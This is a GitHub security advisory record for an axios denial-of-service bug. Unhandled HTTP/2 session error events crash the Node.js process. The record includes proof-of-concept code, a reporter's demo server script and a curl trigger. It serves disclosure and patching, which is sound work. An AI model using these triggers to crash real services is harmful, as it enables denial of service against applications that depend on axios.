{"id":"GHSA-542g-h47m-68v8","summary":"Axios: Denial of Service via Unhandled 'error' Event in HTTP/2 ClientHttp2Session Initialization","details":"## Summary\n\nAxios versions with Node.js HTTP/2 support can terminate the caller’s process when a ClientHttp2Session emits an error event that is not handled by axios.\n\nThis affects applications that use the Node HTTP adapter with httpVersion: 2. A malicious, unavailable, or non-HTTP/2 endpoint can cause an uncaught exception instead of a normal rejected axios request.\n\n## Impact\n\nThe impact is denial of service. In affected applications, an attacker who can influence the request destination, or operate the destination server, may be able to crash the Node.js process.\n\nThis does not affect default HTTP/1.1 usage, browser XHR/fetch adapters, or applications that do not enable axios HTTP/2 support.\n\n## Affected Functionality\n\nAffected path:\n\n- Node.js HTTP adapter\n- httpVersion: 2\n- HTTP/2 session creation/reuse through Http2Sessions\n- Network/session failures emitted as ClientHttp2Session error events\n\nCaller-controlled http2Options can make the issue easier to trigger, but passing arbitrary attacker input into axios config is caller-controlled behavior and should not be the primary advisory framing.\n\n## Technical Details\n\nHttp2Sessions.getSession() creates a session with http2.connect(authority, options) but only registers a close handler. It does not register an error handler on the returned ClientHttp2Session.\n\nWhen the session emits error, Node treats it as an unhandled EventEmitter error and throws. This can bypass the normal axios Promise rejection path and terminate the process.\n\n## Proof of Concept of Attack\n```js\nimport axios from './index.js';\n\nawait axios.get('http://127.0.0.1:1/', {\n  httpVersion: 2,\n  timeout: 1000\n});\n```\n\nExpected vulnerable behavior: the process exits with an uncaught ECONNREFUSED session error instead of only rejecting the axios request.\n\n## Workarounds\n\nDisable axios HTTP/2 for untrusted or user-influenced destinations and use the default HTTP/1.1 adapter until a fixed release is available. Also avoid passing attacker-controlled values into http2Options; axios config is trusted application input.\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003ch3\u003eOriginal report\u003c/h3\u003e\u003c/summary\u003e\n  \nHi, i'm RelunSec a security researcher working with **InsiteTech.jp**\n\ni want let you known, i finded a DoS in axios, to reproduce that, that is the example of a server\n\n```js\nconst http = require('http');\n// Import the local axios version to ensure the patch is active\nconst axios = require('../../lib/axios.js').default; \nconst url = require('url');\n\n// A public HTTP/2 server to make internal requests to.\n// This simulates an external service your application might interact with over HTTP/2.\nconst TARGET_URL = 'https://nghttp2.org/'; \nconst PORT = 3000;\n\nconst server = http.createServer(async (req, res) =\u003e {\n  const parsedUrl = url.parse(req.url, true);\n  const http2optionId = parsedUrl.query.http2optionId;\n\n  if (!http2optionId) {\n  console.warn(`[SERVER] Rejected request: Missing http2optionId parameter`);\n  res.writeHead(400, { 'Content-Type': 'text/plain' });\n  res.end('Error: Missing http2optionId query parameter. Usage: ?http2optionId=value\\n');\n  return; \n}\n\n  console.log(`[SERVER] Received request with http2optionId: ${http2optionId}`);\n\n  // Create an Axios instance configured for HTTP/2\n  // The 'id' in http2Options makes each session configuration unique.\n  const axiosInstance = axios.create({\n    baseURL: TARGET_URL,\n    httpVersion: 2,\n    http2Options: {\n      // rejectUnauthorized: false, // Uncomment if targeting a local HTTP/2 server with self-signed cert\n      id: http2optionId, // This is the attacker-controlled unique part\n    },\n    // Adding a short timeout to prevent attacker from waiting too long if target is slow\n    timeout: 5000 \n  });\n\n  try {\n    const response = await axiosInstance.get('/');\n    res.writeHead(200, { 'Content-Type': 'text/plain' });\n    res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\\nStatus: ${response.status}`);\n  } catch (error) {\n    // Check for the specific error indicating session limit reached\n    if (error.isAxiosError && error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {\n      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);\n      res.writeHead(500, { 'Content-Type': 'text/plain' });\n      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);\n    } else {\n      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);\n      res.writeHead(500, { 'Content-Type': 'text/plain' });\n      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);\n    }\n  }\n});\n\nserver.listen(PORT, () =\u003e {\n  console.log(`PoC Server listening on http://localhost:${PORT}`);\n  console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);\n  console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);\n  console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);\n});\n```\n\ni tested all that in latest git version, after starting the server.cjs, to trigger that you just need do\n\n```rust\nrelunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi\ncurl: (52) Empty reply from server\n```\n\nthat is extremly simple to trigger\n\nit confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash\n\u003c/details\u003e\n\n---","aliases":["CVE-2026-101901"],"modified":"2026-09-30T15:15:04.061469672Z","published":"2026-09-30T15:01:07Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-09-30T15:01:07Z","nvd_published_at":"2026-09-28T18:17:18Z","cwe_ids":["CWE-400"]},"references":[{"type":"WEB","url":"https://github.com/axios/axios/security/advisories/GHSA-542g-h47m-68v8"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-101901"},{"type":"WEB","url":"https://github.com/axios/axios/pull/11141"},{"type":"WEB","url":"https://github.com/axios/axios/commit/d19040bda7a8be2f82c3c6e1a5bc03917daee39a"},{"type":"PACKAGE","url":"https://github.com/axios/axios"},{"type":"WEB","url":"https://github.com/axios/axios/releases/tag/v1.20.0"}],"affected":[{"package":{"name":"axios","ecosystem":"npm","purl":"pkg:npm/axios"},"ranges":[{"type":"SEMVER","events":[{"introduced":"1.13.0"},{"fixed":"1.20.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-542g-h47m-68v8/GHSA-542g-h47m-68v8.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"}]}